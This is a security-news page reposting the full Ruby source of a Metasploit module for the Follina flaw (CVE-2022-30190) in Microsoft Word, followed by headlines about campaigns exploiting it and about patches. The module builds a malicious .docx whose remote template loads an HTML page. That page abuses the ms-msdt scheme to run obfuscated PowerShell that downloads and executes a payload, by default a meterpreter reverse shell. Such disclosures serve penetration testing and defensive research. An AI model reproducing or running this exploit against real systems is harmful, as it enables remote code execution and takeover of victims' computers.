Security
Headlines
HeadlinesLatestCVEs

Headline

Microsoft Office Word MSDTJS Code Execution

This Metasploit module generates a malicious Microsoft Word document that when loaded, will leverage the remote template feature to fetch an HTML document and then use the ms-msdt scheme to execute PowerShell code.

Packet Storm
#vulnerability#web#windows#microsoft#js#git#java#auth#ssl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::FILEFORMAT  include Msf::Exploit::Powershell  include Msf::Exploit::Remote::HttpServer::HTML  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Microsoft Office Word MSDTJS',        'Description' => %q{          This module generates a malicious Microsoft Word document that when loaded, will leverage the remote template          feature to fetch an `HTML` document and then use the `ms-msdt` scheme to execute `PowerShell` code.        },        'References' => [          ['CVE', '2022-30190'],          ['URL', 'https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/'],          ['URL', 'https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19'],          ['URL', 'https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/'],          ['URL', 'https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e'],          ['URL', 'https://twitter.com/GossiTheDog/status/1531608245009367040'],          ['URL', 'https://github.com/JMousqueton/PoC-CVE-2022-30190']        ],        'Author' => [          'nao sec', # Original disclosure.          'mekhalleh (RAMELLA Sébastien)' # Zeop CyberSecurity        ],        'DisclosureDate' => '2022-05-29',        'License' => MSF_LICENSE,        'Privileged' => false,        'Platform' => 'win',        'Arch' => [ARCH_X86, ARCH_X64],        'Payload' => {          'DisableNops' => true        },        'DefaultOptions' => {          'DisablePayloadHandler' => false,          'FILENAME' => 'msf.docx',          'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',          'SRVHOST' => Rex::Socket.source_address('1.2.3.4')        },        'Targets' => [          [ 'Microsoft Office Word', {} ]        ],        'DefaultTarget' => 0,        'Notes' => {          'AKA' => ['Follina'],          'Stability' => [CRASH_SAFE],          'Reliability' => [UNRELIABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptPath.new('CUSTOMTEMPLATE', [false, 'A DOCX file that will be used as a template to build the exploit.']),      OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])    ])  end  def get_file_in_docx(fname)    i = @docx.find_index { |item| item[:fname] == fname }    unless i      fail_with(Failure::NotFound, "This template cannot be used because it is missing: #{fname}")    end    @docx.fetch(i)[:data]  end  def get_template_path    datastore['CUSTOMTEMPLATE'] || File.join(Msf::Config.data_directory, 'exploits', 'word_msdtjs.docx')  end  def generate_html    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.ps1"    dummy = ''    (1..random_int(61, 100)).each do |_n|      dummy += '//' + rand_text_alpha(100) + "\n"    end    cmd = Rex::Text.encode_base64("IEX(New-Object Net.WebClient).downloadString('#{uri}')")    js_content = "window.location.href = \"ms-msdt:/id PCWDiagnostic /skip force /param \\\"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'#{cmd}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\\\"\";"    if datastore['OBFUSCATE']      print_status('Obfuscate JavaScript content')      js_content = Rex::Exploitation::JSObfu.new js_content      js_content = js_content.obfuscate(memory_sensitive: false)    end    html = '<!DOCTYPE html><html><head><meta http-equiv="Expires" content="-1"><meta http-equiv="X-UA-Compatible" content="IE=11"></head><body><script>'    html += "\n#{dummy}\n#{js_content}\n"    html += '</script></body></html>'    html  end  def inject_docx    document_xml = get_file_in_docx('word/document.xml')    unless document_xml      fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')    end    document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')    unless document_xml_rels      fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')    end    uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"    @docx.each do |entry|      case entry[:fname]      when 'word/_rels/document.xml.rels'        entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', "#{uri}&#x21;")      end    end  end  def normalize_uri(*strs)    new_str = strs * '/'    new_str = new_str.gsub!('//', '/') while new_str.index('//')    # makes sure there's a starting slash    unless new_str.start_with?('/')      new_str = '/' + new_str    end    new_str  end  def on_request_uri(cli, request)    header_html = {      'Access-Control-Allow-Origin' => '*',      'Access-Control-Allow-Methods' => 'GET, POST',      'Cache-Control' => 'no-store, no-cache, must-revalidate',      'Content-Type' => 'text/html; charset=UTF-8'    }    if request.method.eql? 'HEAD'      send_response(cli, '', header_html)    elsif request.method.eql? 'OPTIONS'      response = create_response(501, 'Unsupported Method')      response['Content-Type'] = 'text/html'      response.body = ''      cli.send_response(response)    elsif request.raw_uri.to_s.end_with? '.html'      print_status('Sending HTML Payload')      send_response_html(cli, generate_html, header_html)    elsif request.raw_uri.to_s.end_with? '.ps1'      print_status('Sending PowerShell Payload')      send_response(cli, @payload_data, header_html)    end  end  def pack_docx    @docx.each do |entry|      if entry[:data].is_a?(Nokogiri::XML::Document)        entry[:data] = entry[:data].to_s      end    end    Msf::Util::EXE.to_zip(@docx)  end  def primer    print_status('Generating a malicious docx file')    @proto = (datastore['SSL'] ? 'https' : 'http')    template_path = get_template_path    unless File.extname(template_path).downcase.end_with?('.docx')      fail_with(Failure::BadConfig, 'Template is not a docx file!')    end    print_status("Using template '#{template_path}'")    @docx = unpack_docx(template_path)    print_status('Injecting payload in docx document')    inject_docx    print_status("Finalizing docx '#{datastore['FILENAME']}'")    file_create(pack_docx)    @payload_data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)    super  end  def random_int(min, max)    rand(max - min) + min  end  def unpack_docx(template_path)    document = []    Zip::File.open(template_path) do |entries|      entries.each do |entry|        if entry.name.downcase.end_with?('.xml', '.rels')          content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?        elsif entry.file?          content = entry.get_input_stream.read        end        vprint_status("Parsing item from template: #{entry.name}")        document << { fname: entry.name, data: content }      end    end    document  endend

Related news

Russia's 'Fighting Ursa' APT Uses Car Ads to Install HeadLace Malware

The scheme, from the group also known as APT28, involves targeting Eastern European diplomats in need of personal transportation and tempting them with a purported good deal on a Audi Q7 Quattro SUV.

Major Cybersecurity Agencies Collaborate to Unveil 2022's Most Exploited Vulnerabilities

A four-year-old critical security flaw impacting Fortinet FortiOS SSL has emerged as one of the most routinely and frequently exploited vulnerabilities in 2022. "In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems," cybersecurity and intelligence agencies from the Five

XWorm Malware Exploits Follina Vulnerability in New Wave of Attacks

Cybersecurity researchers have discovered an ongoing phishing campaign that makes use of a unique attack chain to deliver the XWorm malware on targeted systems. Securonix, which is tracking the activity cluster under the name MEME#4CHAN, said some of the attacks have primarily targeted manufacturing firms and healthcare clinics located in Germany. "The attack campaign has been leveraging rather

Chinese Espionage Hackers Target Tibetans Using New LOWZERO Backdoor

A China-aligned advanced persistent threat actor known as TA413 weaponized recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called LOWZERO as part of an espionage campaign aimed at Tibetan entities. Targets primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan

Some Members of Conti Group Targeting Ukraine in Financially Motivated Attacks

Former members of the Conti cybercrime cartel have been implicated in five different campaigns targeting Ukraine from April to August 2022. The findings, which come from Google's Threat Analysis Group (TAG), builds upon a prior report published in July 2022, detailing the continued cyber activity aimed at the Eastern European nation amid the ongoing Russo-Ukrainian war. "UAC-0098 is a threat

Microsoft Issues Patches for 121 Flaws, Including Zero-Day Under Active Attack

As many as 121 new security flaws were patched by Microsoft as part of its Patch Tuesday updates for the month of August, which also includes a fix for a Support Diagnostic Tool vulnerability that the company said is being actively exploited in the wild. Of the 121 bugs, 17 are rated Critical, 102 are rated Important, one is rated Moderate, and one is rated Low in severity. Two of the issues

Woody RAT: A new feature-rich malware spotted in the wild

The Malwarebytes Threat Intelligence team has discovered a new Remote Access Trojan that we dubbed Woody Rat used to target Russian entities. The post Woody RAT: A new feature-rich malware spotted in the wild appeared first on Malwarebytes Labs.

Empower Your Security Operations Team to Combat Emerging Threats

When examining the modern threat landscape, empowering your security operations and overcoming the limitations inherent with other malware prevention solutions is imperative.

You Need to Update Windows and Chrome Right Now

Plus: Google issues fixes for Android bugs, and Cisco, Citrix, SAP, WordPress, and more issue major patches for enterprise systems.

Russia's APT28 Launches Nuke-Themed Follina Exploit Campaign

Researchers have spotted the threat group, also known as Fancy Bear and Sofacy, using the Windows MSDT vulnerability to distribute information stealers to users in Ukraine.

Russian Hackers Exploiting Microsoft Follina Vulnerability Against Ukraine

The Computer Emergency Response Team of Ukraine (CERT-UA) has cautioned of a new set of spear-phishing attacks exploiting the "Follina" flaw in the Windows operating system to deploy password-stealing malware. Attributing the intrusions to a Russian nation-state group tracked as APT28 (aka Fancy Bear or Sofacy), the agency said the attacks commence with a lure document titled "Nuclear Terrorism

Update now!  Microsoft patches Follina, and many other security updates

Patch Tuesday for June 2022 brought a fix for Follina and many other security vulnerabilities. Time to figure out what needs to be prioritized. The post Update now!  Microsoft patches Follina, and many other security updates appeared first on Malwarebytes Labs.

Microsoft Patch Tuesday, June 2022 Edition

Microsoft on Tuesday released software updates to fix 60 security vulnerabilities in its Windows operating systems and other software, including a zero-day flaw in all supported Microsoft Office versions on all flavors of Windows that's seen active exploitation for at least two months now. On a lighter note, Microsoft is officially retiring its Internet Explorer (IE) web browser, which turns 27 years old this year.

Patch Tuesday: Microsoft Issues Fix for Actively Exploited 'Follina' Vulnerability

Microsoft officially released fixes to address an actively exploited Windows zero-day vulnerability known as Follina as part of its Patch Tuesday updates. Also addressed by the tech giant are 55 other flaws, three of which are rated Critical, 51 are rated Important, and one is rated Moderate in severity. Separately, five other shortcomings were resolved in the Microsoft Edge browser. <!-

Follina Exploited by State-Sponsored Hackers

A government-aligned attacker tried using a Microsoft vulnerability to attack U.S. and E.U. government targets.

Threat Source newsletter (June 2, 2022) — An RSA Conference primer

By Jon Munshaw.  Welcome to this week’s edition of the Threat Source newsletter.  Many of you readers may be gearing up for a West Coast swing over the next few weeks through San Francisco and Las Vegas for RSA and Cisco Live, respectively. And we’re right behind you!   Talos... [[ This is only the beginning! Please visit the blog for the complete entry ]]

Fighting Follina: Application Vulnerabilities and Detection Possibilities

Although organizations should perform proper risk analysis and patch as soon as practical after there's a fix for this vulnerability, defenders still have options before that's released.

FAQ: Mitigating Microsoft Office’s ‘Follina’ zero-day

FAQ for the new Follina zero-day vulnerability. What you can do to protect your computers right now. The post FAQ: Mitigating Microsoft Office’s ‘Follina’ zero-day appeared first on Malwarebytes Labs.

Unofficial Micropatch for Follina Released as Chinese Hackers Exploit the 0-day

By Waqas The Follina vulnerability was originally discovered after a malicious Microsoft Word document was uploaded on VirusTotal from a… This is a post from HackRead.com Read the original post: Unofficial Micropatch for Follina Released as Chinese Hackers Exploit the 0-day

Threat Advisory: Zero-day vulnerability in Microsoft diagnostic tool MSDT could lead to code execution

A recently discovered zero-day vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT) made headlines over the past few days. CVE-2022-30190, also known under the name "Follina," exists when MSDT is called using the URL protocol from an application, such as Microsoft Office, Microsoft... [[ This is only the beginning! Please visit the blog for the complete entry ]]

Microsoft Releases Workaround for ‘One-Click’ 0Day Under Active Attack

Threat actors already are exploiting vulnerability, dubbed ‘Follina’ and originally identified back in April, to target organizations in Russia and Tibet, researchers said.

Chinese Hackers Begin Exploiting Latest Microsoft Office Zero-Day Vulnerability

An advanced persistent threat (APT) actor aligned with Chinese state interests has been observed weaponizing the new zero-day flaw in Microsoft Office to achieve code execution on affected systems. "TA413 CN APT spotted [in-the-wild] exploiting the Follina zero-day using URLs to deliver ZIP archives which contain Word Documents that use the technique," enterprise security firm Proofpoint said in

New Microsoft Zero-Day Attack Underway

"Follina" vulnerability in Microsoft Support Diagnostic Tool (MSDT) affects all currently supported Windows versions and can be triggered via specially crafted Office documents.

Microsoft Office MSDT Follina Proof Of Concept

Proof of concept for the remote code execution vulnerability in MSDT known as Follina.

Microsoft Releases Workarounds for Office Vulnerability Under Active Exploitation

Microsoft on Monday published guidance for a newly discovered zero-day security flaw in its Office productivity suite that could be exploited to achieve code execution on affected systems. The weakness, now assigned the identifier CVE-2022-30190, is rated 7.8 out of 10 for severity on the CVSS vulnerability scoring system. Microsoft Office versions Office 2013, Office 2016, Office 2019, and

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution